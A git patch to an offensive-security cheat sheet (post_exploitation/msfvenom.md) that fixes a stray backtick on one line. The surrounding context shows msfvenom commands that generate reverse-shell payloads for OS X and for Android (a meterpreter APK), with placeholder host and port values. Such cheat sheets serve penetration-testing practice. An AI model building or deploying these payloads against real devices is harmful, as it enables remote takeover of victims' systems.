From 0dce30bd26b9dcfff2a66e7214d63293cec336cb Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Sun, 18 Jul 2021 23:17:24 -0400 Subject: [PATCH] Update msfvenom.md --- post_exploitation/msfvenom.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/post_exploitation/msfvenom.md b/post_exploitation/msfvenom.md index 879bdb2..3cca38f 100644 --- a/post_exploitation/msfvenom.md +++ b/post_exploitation/msfvenom.md @@ -30,7 +30,7 @@ msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > ex ### Creates a simple TCP Payload for Android ``` -msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk` +msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk ``` ## Web Payloads